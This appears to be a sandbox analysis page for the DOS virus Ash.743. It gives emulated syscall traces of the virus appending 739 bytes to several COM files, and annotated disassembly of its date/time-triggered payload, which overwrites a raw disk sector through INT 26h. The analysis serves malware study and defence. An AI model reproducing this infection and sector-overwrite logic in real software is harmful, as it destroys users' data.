Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.h


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:37.333399369Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:42:37.335934629Z 78 PC: 1419c | Find first file
2018-12-17T22:42:37.342059107Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:37.348803556Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.368689644Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.371113006Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.374040702Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.388804126Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.391087888Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.397850291Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.406120208Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.410133332Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:42:37.416564036Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.422790205Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.424933228Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.434709042Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.452179448Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.454517525Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.471960319Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.482035439Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.498367737Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:42:37.505549917Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.51574472Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.519212392Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.522670853Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.531122537Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.533080577Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.555065858Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.56421326Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.567214489Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:42:37.574834207Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.581491523Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.583228462Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.589915999Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.598057689Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.599817291Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.617732243Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.626190839Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.62915631Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:42:37.637397955Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.644183108Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.646076437Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.649995564Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.658225209Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.659963783Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.667740705Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.676627517Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.679556206Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:42:37.687364511Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.69434596Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.696092975Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.69930222Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.710184911Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.712051204Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.719105765Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.735346872Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.737987873Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:42:37.745045989Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.752352239Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.753886062Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.756949821Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.773895259Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.775249251Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.781703374Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.813926324Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.816633085Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:42:37.822954997Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.826526072Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.828456555Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.846891188Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
; Listing window from PC 0x14242, where the trace row above logs the return from
; INT 21h "Get date" (op 42 = AH 2Ah). DOS returns DH = month, DL = day; the row's
; own instruction, cmp dl, 4, tests the day of the month.
0x14245: jne 0x14251                ; day != 4: fall back to the time-of-day test
0x14247: cmp dh, 7                  ; month == 7 ?
0x1424a: jne 0x14251                ; not 4 July: fall back to the time-of-day test
0x1424c: xor ax, ax                 ; 4 July: ax = 0
0x1424e: jmp 0x1426f                ; target lies beyond the end of this window
0x14250: nop
0x14251: mov ah, 0x2c               ; AH = 2Ch: DOS Get time
0x14253: int 0x21                   ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl                  ; minute == 0 ?
0x14257: jne 0x1427c                ; no: skip ahead to 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip ahead to 0x1427c
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax                  ; sets ZF when ax == 0 (window ends here)
2018-12-17T22:42:37.850269366Z 44 PC: 14255 | Get time 0x14255: or cl, cl
; Listing window from PC 0x14255, where the trace row above logs the return from
; INT 21h "Get time" (op 44 = AH 2Ch). DOS returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s; the row's own instruction, or cl, cl, tests the minute.
0x14257: jne 0x1427c                ; minute != 0: skip the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip the disk write
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax
0x1426c: jne 0x1426f                ; ax != 0: use it as is
0x1426e: inc ax                     ; ax == 0: force it to 1
0x1426f: mov dx, ax                 ; DX = first logical sector (0x1426f is also the target of the jmp at 0x1424e in the Get date listing)
0x14271: mov cx, 1                  ; CX = 1 sector
0x14274: xor bx, bx                 ; BX = 0: data is taken from DS:0000
0x14276: mov ah, 0x19               ; AH = 19h: DOS Get default drive
0x14278: int 0x21                   ; returns AL = current drive (0 = A:)
; Defender note: INT 26h is the DOS absolute disk write (AL = drive, CX = count,
; DX = first sector, DS:BX = data). It overwrites one raw sector of the current
; drive, bypassing the file system; the sector number comes from the clock sum above.
0x1427a: int 0x26
0x1427c: mov bx, 0x31a              ; target of both skips above (window ends here)
2018-12-17T22:42:37.853339554Z 44 PC: 14283 | Get time 0x14283: inc dh
; Listing window from PC 0x14283, where the trace row above logs the return from
; another INT 21h "Get time" (DH = second). The row's own instruction, inc dh,
; leaves dh = second + 1.
0x14285: cmp dh, byte ptr [0x319]   ; byte at DS:0x319 -- presumably the number of table entries; confirm
0x14289: jl 0x14291                 ; dh < [0x319]: use dh as the index
0x1428b: sub dh, byte ptr [0x319]   ; otherwise subtract and retest (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14295: cwde
0x14296: shl ax, 1                  ; index * 2: entries are words
; NOTE(review): bx is presumably still 0x31a from the mov bx, 0x31a at 0x1427c;
; the instructions between 0x1427c and 0x14283 are not in this window.
0x14298: add bx, ax                 ; bx = address of the selected entry
0x1429a: mov si, word ptr [bx]      ; si = pointer stored in that entry
0x1429c: mov ch, byte ptr [si - 1]  ; ch = byte stored just before the pointed-to data
0x1429f: mov dx, si
0x142a1: mov ah, 9                  ; AH = 09h: DOS print '$'-terminated string at DS:DX
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20                   ; ch == 0: terminate the program
0x142ac: cmp ch, 1
0x142af: jne 0x142b2                ; handling of other ch values is outside this window

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.574596358Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.576785885Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.583034742Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.589477381Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.596005002Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.597278207Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.599851384Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.616719905Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.617970649Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.624155217Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.633225811Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.635887163Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.642748016Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.65026444Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.651672838Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.65427124Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.662219659Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.663871513Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.669178107Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.676106645Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.680846153Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.6876359Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.693732934Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.695632931Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.698108044Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.705580682Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.707661037Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.714128711Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.721740746Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.725041Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.731866578Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.738015869Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.740669852Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.743202839Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.751270748Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.753448133Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.759736708Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.76784426Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.77100244Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.777391831Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.783474124Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.785516983Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.788656072Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.796239537Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.79801379Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.804483817Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.812572299Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.816050691Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.822809517Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.828842523Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.830256066Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.833481884Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.843468901Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.844953057Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.852024937Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.860231858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.862953187Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.870450344Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.876953973Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.87854875Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.882657333Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.887737164Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.888839494Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.893517821Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.898694589Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.900485317Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.905188681Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.907030557Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.908298423Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.910598254Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
; Listing window from PC 0x14242, where the trace row above logs the return from
; INT 21h "Get date" (op 42 = AH 2Ah). DOS returns DH = month, DL = day; the row's
; own instruction, cmp dl, 4, tests the day of the month.
0x14245: jne 0x14251                ; day != 4: fall back to the time-of-day test
0x14247: cmp dh, 7                  ; month == 7 ?
0x1424a: jne 0x14251                ; not 4 July: fall back to the time-of-day test
0x1424c: xor ax, ax                 ; 4 July: ax = 0
0x1424e: jmp 0x1426f                ; target lies beyond the end of this window
0x14250: nop
0x14251: mov ah, 0x2c               ; AH = 2Ch: DOS Get time
0x14253: int 0x21                   ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl                  ; minute == 0 ?
0x14257: jne 0x1427c                ; no: skip ahead to 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip ahead to 0x1427c
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax                  ; sets ZF when ax == 0 (window ends here)
2018-12-25T12:02:07.912172273Z 44 PC: 14255 | Get time 0x14255: or cl, cl
; Listing window from PC 0x14255, where the trace row above logs the return from
; INT 21h "Get time" (op 44 = AH 2Ch). DOS returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s; the row's own instruction, or cl, cl, tests the minute.
0x14257: jne 0x1427c                ; minute != 0: skip the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip the disk write
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax
0x1426c: jne 0x1426f                ; ax != 0: use it as is
0x1426e: inc ax                     ; ax == 0: force it to 1
0x1426f: mov dx, ax                 ; DX = first logical sector (0x1426f is also the target of the jmp at 0x1424e in the Get date listing)
0x14271: mov cx, 1                  ; CX = 1 sector
0x14274: xor bx, bx                 ; BX = 0: data is taken from DS:0000
0x14276: mov ah, 0x19               ; AH = 19h: DOS Get default drive
0x14278: int 0x21                   ; returns AL = current drive (0 = A:)
; Defender note: INT 26h is the DOS absolute disk write (AL = drive, CX = count,
; DX = first sector, DS:BX = data). It overwrites one raw sector of the current
; drive, bypassing the file system; the sector number comes from the clock sum above.
0x1427a: int 0x26
0x1427c: mov bx, 0x31a              ; target of both skips above (window ends here)
2018-12-25T12:02:07.913685712Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.784564191Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.78638335Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.790336728Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.798088533Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.805190171Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.806525319Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.808990356Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.82302222Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.825663363Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.833028667Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.843300387Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.846508348Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.853118619Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.859678334Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.861491967Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.864241628Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.872036568Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.874038005Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.881507317Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.889769186Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.892958238Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.899307392Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.905637939Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.908346408Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.911084022Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.918961008Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.921625443Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.928799772Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.937121763Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.941864704Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.950171906Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.956887849Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.958837583Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.961666097Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.969644391Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.971029178Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.977953596Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.988982596Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.991424678Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.998026601Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.004138861Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.005495871Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.01839623Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.026488556Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.028148653Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.035694954Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.043786447Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.046336809Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.053820278Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.060171603Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.061643899Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.065033381Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.073958594Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.075360662Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.082633548Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.091081177Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.093624135Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.101554145Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.107805882Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.109055842Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.1125212Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.120436388Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.122079856Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.12945063Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.138061341Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.141026043Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.148992957Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.152618025Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.154655647Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.157325934Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
; Listing window from PC 0x14242, where the trace row above logs the return from
; INT 21h "Get date" (op 42 = AH 2Ah). DOS returns DH = month, DL = day; the row's
; own instruction, cmp dl, 4, tests the day of the month.
0x14245: jne 0x14251                ; day != 4: fall back to the time-of-day test
0x14247: cmp dh, 7                  ; month == 7 ?
0x1424a: jne 0x14251                ; not 4 July: fall back to the time-of-day test
0x1424c: xor ax, ax                 ; 4 July: ax = 0
0x1424e: jmp 0x1426f                ; target lies beyond the end of this window
0x14250: nop
0x14251: mov ah, 0x2c               ; AH = 2Ch: DOS Get time
0x14253: int 0x21                   ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl                  ; minute == 0 ?
0x14257: jne 0x1427c                ; no: skip ahead to 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip ahead to 0x1427c
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax                  ; sets ZF when ax == 0 (window ends here)
2018-12-25T12:02:08.160430784Z 44 PC: 14255 | Get time 0x14255: or cl, cl
; Listing window from PC 0x14255, where the trace row above logs the return from
; INT 21h "Get time" (op 44 = AH 2Ch). DOS returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s; the row's own instruction, or cl, cl, tests the minute.
0x14257: jne 0x1427c                ; minute != 0: skip the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip the disk write
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax
0x1426c: jne 0x1426f                ; ax != 0: use it as is
0x1426e: inc ax                     ; ax == 0: force it to 1
0x1426f: mov dx, ax                 ; DX = first logical sector (0x1426f is also the target of the jmp at 0x1424e in the Get date listing)
0x14271: mov cx, 1                  ; CX = 1 sector
0x14274: xor bx, bx                 ; BX = 0: data is taken from DS:0000
0x14276: mov ah, 0x19               ; AH = 19h: DOS Get default drive
0x14278: int 0x21                   ; returns AL = current drive (0 = A:)
; Defender note: INT 26h is the DOS absolute disk write (AL = drive, CX = count,
; DX = first sector, DS:BX = data). It overwrites one raw sector of the current
; drive, bypassing the file system; the sector number comes from the clock sum above.
0x1427a: int 0x26
0x1427c: mov bx, 0x31a              ; target of both skips above (window ends here)
2018-12-25T12:02:08.162477271Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.80366714Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.805533906Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.81124492Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.817417854Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.824346777Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.82564926Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.828470328Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.84447349Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.846183653Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.852485457Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.861538943Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.864117501Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.870379639Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.87739315Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.879479291Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.882154721Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.890332724Z 66 PC: 141f6 | Move file pointer (See above)
